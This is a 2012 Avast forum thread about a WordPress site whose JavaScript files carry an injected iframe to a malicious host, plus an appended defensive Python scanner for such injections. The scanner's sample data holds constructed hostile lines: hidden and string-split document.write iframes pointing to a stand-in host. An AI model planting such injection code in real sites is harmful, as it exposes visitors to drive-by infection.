Author Topic: Web Shield - blocked trojan - js:scriptdc-inf [trj]?  (Read 8543 times)

mlapage

  • Guest
Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« on: January 20, 2012, 12:18:08 AM »
I have a website wxw.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike
« Last Edit: January 20, 2012, 06:33:10 AM by Milos »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
« Last Edit: January 20, 2012, 03:00:00 AM by Pondus »

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #2 on: January 20, 2012, 02:41:41 AM »
@ Pondus

When clicking your URL for -www.msolarpro.com results by Sucuri, Avast gives an alert for a blocked trojan. Check it out.

Sucuri - INFECTED   -http://sitecheck.sucuri.net/results/www.msolarpro.com

Regards.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #3 on: January 20, 2012, 02:45:23 AM »
I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results. As presumably the example of the actual script, document .  write gives the web shield a fit.

So you will have to break the link.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

nsm0220

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #4 on: January 20, 2012, 03:04:16 AM »
I have a website www.msolarpro.com. When I go to the site I get avast! Web Shield blocked trojan horse message. I Google'd the trojan and didn't find out how to eradicate it. What caused it? Is it a false positive from Web Shield?
Any help here?

Thanks,

Mike

Btw, it does have a Trojan in it. I went to the link and gdata found the Trojan, so the site has a Trojan in it.

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #6 on: January 20, 2012, 03:20:03 AM »
@ DavidR

I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat! It really gave me a scare. First time though. Hope I am safe. What do you think happened?

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #7 on: January 20, 2012, 03:27:34 AM »
avast shield reacted on the code displayed at Sucuri ;)

It also happens here in the forum if someone posts code that avast detects.

See attached screenshot.
« Last Edit: January 20, 2012, 03:30:00 AM by Pondus »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #8 on: January 20, 2012, 03:41:17 AM »
@ DavidR

I see we are going to have to exercise care in giving links to the results in sucuri.net as the web shield has just alerted on that set of results.

No sheat! It really gave me a scare. First time though. Hope I am safe. What do you think happened?

I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

This happens when you are using some analysis sites that give more information on what is found is a copy of what is on the site. I have a number of exclusions for some analysis sites.

It is just that in the past sucuri didn't display the page link to the results so we had to post an image of the information. Now that it does those visiting the results page could well get a shock.

So I think it is back to images.

iroc9555

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #9 on: January 20, 2012, 04:04:08 AM »
OK.

I said what I believe happened, sucuri displays the code extracted from the suspect site and the web shield detects it in the same way it would on the original site.

I got it now. Your UK English messes my US English learned as a second language. Thanks.

Back to mlapage. Sorry guy for the momentary hijacking.
« Last Edit: January 20, 2012, 04:14:43 AM by iroc9555 »

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37507
  • Not a avast user
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #10 on: January 20, 2012, 12:56:38 PM »
Norman lab
Quote
Files:
-www.msolarpro.com.htm : Clean!
l10n.js : Clean!

These are the clean files, but we do get 'iframe' of 'brunno.cz.cc' but this is an inactive link now, so marking as clean.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88898
  • No support PMs thanks
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #11 on: January 20, 2012, 01:42:30 PM »
The Norman attitude is strange to me as the site in itself has been hacked (WordPress files, don't know if it is an old vulnerable version being exploited). Regardless if the remote source is up at the time it is checked, as there is nothing to stop the remote site becoming active.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #12 on: January 21, 2012, 12:35:22 AM »
Well, this is flagged as suspicious by avast as JS:ScriptDC-inf[Trj] for the jsunpack analysis
of mentioned site:
-www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2 suspicious
[suspicious:2] (ipaddr:184.154.88.218) (script) -www.msolarpro.com/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.2
     status: (referer=-www.msolarpro.com/)saved 386 bytes 8312b9b0c984c54fbc8feaf66bcb4b1dd3acaf58
     info: [decodingLevel=0] found JavaScript
Avast webshield flags  -www.msolarpro.com/wp-includes/js/l10n.js?ver=20101110
But to Pondus, also have a look here for a second op: http://forum.avast.com/index.php?action=printpage;topic=83287.0  where a false positive was found....and the IP also had an instance of HTML/Redirector.MA on it (now dead),
Also consider this VT scan: https://www.virustotal.com/url/b417c30323119157b1261a38567c6b62c55941dd22dade7bc984be07d0f1068e/analysis/1327015879/   (detection from Bitdefender, but TrafficLight does not list it)

Now we can finally come to the point why the avast webshield blocks this, re: http://wepawet.iseclab.org/view.php?hash=be10484672ca0c3fdf9004f67f05cc13&t=1327101730&type=js

The iFrame source found there: -http://brunno.cz.cc
has malicious activity, found here, see:
http://google.com/safebrowsing/diagnostic?site=brunno.cz.cc/&hl=ru-RU
brunno.cz.cc - this site has infected 76 domains as we read there
via -/showthread.php?t=37220338 on it!

We can conclude that the dents of the avast web shield really dig that deep, my good forum friends, as I have explained and demonstrated above in my explanation of the website scan analysis. Yes, I repeat this again - the avast webshield, notwithstanding the status of the exploit found, is an awesome and formidable protection tool.

polonus
« Last Edit: January 21, 2012, 01:23:21 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
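
Added example, not part of any post in this thread: a static check a site owner could run over a copy of the site's JavaScript files to find iframes that are written into the page with document.write and point at a foreign host, which is the pattern the scanners above reported. It makes no DNS or HTTP request, so a finding stands whether or not the remote host is currently up. The file contents, the host names site.example and injected.example, and the function names are constructed for illustration; only the two flagged file paths are taken from the thread.

```python
import re
from urllib.parse import urlparse

# document.write(...) / document.writeln(...), tolerating spaces around the dot.
# The argument is taken up to the first ')', which is enough for a one-line tag.
WRITE_CALL = re.compile(r"document\s*\.\s*write(?:ln)?\s*\((.*?)\)", re.S | re.I)
IFRAME_SRC = re.compile(r"<\s*iframe\b[^>]*?\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
STRING_JOIN = re.compile(r"['\"]\s*\+\s*['\"]")  # 'abc' + 'def' -> abcdef

def external_iframes(js_text, site_host):
    """Hosts of iframes emitted via document.write that are not on site_host."""
    hosts = []
    for call in WRITE_CALL.finditer(js_text):
        arg = STRING_JOIN.sub("", call.group(1))
        for match in IFRAME_SRC.finditer(arg):
            src = match.group(1)
            if not re.match(r"(?:https?:)?//", src, re.I):
                continue  # relative URL: stays on the site itself
            host = (urlparse(src).hostname or "").lower()
            if host and host != site_host and not host.endswith("." + site_host):
                hosts.append(host)
    return hosts

def scan_files(files, site_host):
    """Map each file path to the external iframe hosts found in it (static, no DNS/HTTP)."""
    findings = {}
    for path, text in files.items():
        hosts = external_iframes(text, site_host)
        if hosts:
            findings[path] = hosts
    return findings

# Constructed sample contents; only the two flagged file paths come from the thread.
SAMPLE_FILES = {
    "wp-includes/js/l10n.js":
        "function convertEntities(o){return o;}\n"
        "document.write('<iframe src=\"http://injected.example/in.php\" "
        "width=\"1\" height=\"1\"></iframe>');\n",
    "wp-content/plugins/dropdown-menu-widget/scripts/include.js":
        "document . write('<ifr' + 'ame src=\"//injected.example/x\"></ifr' + 'ame>');\n",
    "wp-content/themes/constructed/map.js":
        "document.write('<iframe src=\"/uploads/map.html\"></iframe>');\n",
}

if __name__ == "__main__":
    for path, hosts in scan_files(SAMPLE_FILES, "site.example").items():
        print(path, "->", ", ".join(hosts))
```

Any file it reports should be compared against a clean copy from the original WordPress or plugin package before being restored.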

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #13 on: January 21, 2012, 01:21:37 AM »
@DavidR,

I think the avast point of view is the right one here. As long as the website code stays exploitable, software is not fully patched, reinfection stays an imminent threat.
As long as the webclient can no longer be infected, we could conclude the block could be lifted.

So norman says malcode no longer up or responding, site safe to be visited by user.
This attitude towards the issue is rounding the bends by a mile, so to say.

Better is to lift website blocking when the website is secure for both user and website owner/ website hoster/ webmaster. The software code has been fully patched, exploit code cleansed, all measures have been taken to prevent re-infection. One such action could be as easy as no longer giving away the full server software version, etc.

polonus

mlapage

  • Guest
Re: Web Shield - blocked trojan - js:scriptdc-inf [trj]?
« Reply #14 on: January 21, 2012, 05:27:12 PM »
I thank you all for the help you have provided. I read the replies, however I did not understand all of what was discussed. Does '/sitecheck.sucuri.net/results/' clean the infected code or just inform of the infection?
Where does my website stand at this time, as far as avast program is concerned?

Thanks again,

Mike